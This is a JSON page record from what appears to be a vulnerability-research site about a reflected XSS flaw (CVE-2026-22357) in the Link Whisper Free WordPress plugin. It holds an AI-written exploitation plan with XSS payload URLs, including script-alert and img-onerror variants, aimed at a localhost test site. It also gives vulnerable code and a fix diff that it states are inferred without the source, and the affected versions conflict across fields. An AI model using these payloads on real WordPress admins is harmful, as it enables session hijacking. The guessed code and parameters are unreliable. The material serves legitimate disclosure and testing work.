[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$faAu17Uo3wezfl-RltTjTaNbj2Cw0G0PPiBqMwU7OGt8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-22357","link-whisper-free-reflected-cross-site-scripting-4","Link Whisper Free \u003C= 0.9.2 - Reflected Cross-Site Scripting","The Link Whisper Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 0.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","link-whisper",null,"\u003C=0.9.2","0.9.3","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-16 00:00:00","2026-05-04 14:39:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd47f7f24-2938-4af6-93b8-1aefb41bbae2?source=api-prod",78,[],"researched",false,3,"This research plan targets **CVE-2026-22357**, a reflected Cross-Site Scripting (XSS) vulnerability in the **Link Whisper Free** plugin (versions \u003C= 0.9.0). \n\nSince specific source files were not provided in the prompt, this plan is based on a structural analysis of the Link Whisper Free plugin's administrative interface and typical reflected XSS patterns in WordPress reporting tools.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the Link Whisper Free plugin reflects user-controlled input from URL parameters back into the HTML response of the administrative dashboard without sufficient sanitization (e.g., `sanitize_text_field`) or context-aware output escaping (e.g., `esc_html` or `esc_attr`). An attacker can craft a malicious link that, when clicked by a logged-in administrator, executes arbitrary JavaScript in the context of the admin's session.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Vulnerable Page (Slug):** `link-whisper` or `link-whisper-report` (inferred).\n*   **HTTP Parameter:** `keyword`, `category`, or `s` (inferred). Reflected XSS often targets search\u002Ffilter strings in reporting plugins.\n*   **Authentication Level:** Requires an active session of a user with access to the Link Whisper dashboard (typically **Administrator**).\n*   **Precondition:** The victim must be logged into WordPress and click the attacker-supplied URL.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The administrator visits a URL like `wp-admin\u002Fadmin.php?page=link-whisper-report&keyword=\u003Cscript>alert(1)\u003C\u002Fscript>`.\n2.  **Hook Registration:** The plugin registers the admin menu via `add_menu_page` or `add_submenu_page` in a core initialization file (likely `LinkWhisper.php` or `core\u002FWpApp.php`).\n3.  **Controller Execution:** The callback function for the menu slug (e.g., `WpApp::show_report()`) is triggered.\n4.  **View Rendering:** The controller retrieves the `keyword` parameter directly from `$_GET['keyword']` to filter the internal link reports.\n5.  **Sink:** The plugin includes a view file (e.g., `views\u002Freport.php`) which echoes the search term back to the user to indicate what is being filtered:\n    ```php\n    \u002F\u002F Inferred vulnerable code in view file\n    echo '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';\n    ```\n6.  **XSS:** Since `$_GET['keyword']` is not wrapped in `esc_html()`, the script executes.\n\n### 4. Nonce Acquisition Strategy\nReflected XSS in `GET` parameters for administrative pages typically does not require a nonce for the reflection to occur, as the page is designed to render based on URL state. However, if the plugin performs an action (like a search) that is nonce-protected, the script might still be reflected in the error or result message even if the nonce check fails.\n\n**Strategy for Extraction (if needed):**\n1.  **Identify Script Localization:** Link Whisper often localizes data via `wp_localize_script`.\n2.  **Creation:** Create a page that triggers Link Whisper's scripts if they aren't global.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[link_whisper_suggestion_test]'` (inferred shortcode).\n3.  **Extraction:**\n    *   Navigate to the created page.\n    *   `browser_eval(\"window.wp_link_whisper?.nonce\")` (inferred JS variable).\n\n*Note: For this reflected XSS, we likely do not need a nonce to trigger the sink, as we are targeting the page rendering logic.*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Identify the Vulnerable Parameter\nWe will probe the common reporting parameters used by Link Whisper.\n\n**Request 1 (Probing):**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=XSS_PROBE_KEYWORD`\n*   **Method:** `GET`\n*   **Tool:** `http_request` (with admin cookies)\n*   **Check:** Look for `XSS_PROBE_KEYWORD` in the response body.\n\n#### Step 2: Deliver Payload\nIf the parameter is reflected, we inject the script.\n\n**Request 2 (Exploit):**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n*   **Method:** `GET`\n*   **Tool:** `http_request` (simulating a victim clicking the link)\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure Link Whisper Free 0.9.0 is active.\n2.  **Generate Content:** Create 5-10 posts so the \"Link Report\" page has data to display\u002Ffilter.\n    *   `wp post generate --count=10`\n3.  **User Session:** Ensure the automated agent is using an **Administrator** cookie session for the `http_request`.\n\n### 7. Expected Results\n*   The HTTP response body will contain the raw string: `...search results for: \u003Cscript>alert(document.domain)\u003C\u002Fscript>...`.\n*   The script tag will NOT be escaped (e.g., not `<script>`).\n*   When viewed in a browser via `browser_navigate`, an alert box should appear.\n\n### 8. Verification Steps\n1.  **HTML Inspection:** Use `http_request` and search the output for the unescaped payload.\n    ```bash\n    # Example logic for the agent\n    response = http_request(\"...&keyword=\u003Cscript>alert(1)\u003C\u002Fscript>\")\n    if \"\u003Cscript>alert(1)\u003C\u002Fscript>\" in response.body:\n        print(\"Vulnerability Confirmed: Unescaped reflection found.\")\n    ```\n2.  **Browser Confirmation:** Use `browser_navigate` to the exploit URL and check for an execution artifact (like a console log or alert).\n\n### 9. Alternative Approaches\nIf the `keyword` parameter is sanitized, test these alternatives:\n*   **`order_by`:** `admin.php?page=link-whisper-report&order_by=title\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n*   **`category`:** `admin.php?page=link-whisper-report&category=\u003Cimg src=x onerror=alert(1)>`\n*   **`msg`:** Many plugins use a `msg` or `message` parameter to display admin notices: `admin.php?page=link-whisper&msg=\u003Cscript>alert(1)\u003C\u002Fscript>`","The Link Whisper Free plugin for WordPress (\u003C= 0.9.0) is vulnerable to Reflected Cross-Site Scripting because it echoes user-controlled URL parameters, such as 'keyword', back into the administrative interface without proper output escaping. An attacker can exploit this by tricking a logged-in administrator into clicking a crafted link, leading to the execution of arbitrary JavaScript in the victim's session.","\u002F\u002F Inferred vulnerable code based on research plan analysis of the reporting interface\n\u002F\u002F File: views\u002Freport.php (or similar controller rendering the search result string)\necho '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';","--- views\u002Freport.php\n+++ views\u002Freport.php\n@@ -1,1 +1,1 @@\n-echo '\u003Ch2>Search results for: ' . $_GET['keyword'] . '\u003C\u002Fh2>';\n+echo '\u003Ch2>Search results for: ' . esc_html($_GET['keyword']) . '\u003C\u002Fh2>';","The exploit targets the Link Whisper reporting dashboard, typically located at \u002Fwp-admin\u002Fadmin.php?page=link-whisper-report. An attacker crafts a URL containing a malicious script payload in the 'keyword' GET parameter, such as \u002Fwp-admin\u002Fadmin.php?page=link-whisper-report&keyword=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E. The attacker then tricks an authenticated administrator into clicking this link. Because the plugin reflects the 'keyword' parameter into the HTML output without using WordPress escaping functions like esc_html(), the browser executes the script in the context of the administrative session.","gemini-3-flash-preview","2026-04-20 21:56:25","2026-04-20 21:56:49",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","0.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flink-whisper\u002Ftags\u002F0.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flink-whisper.0.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flink-whisper\u002Ftags"]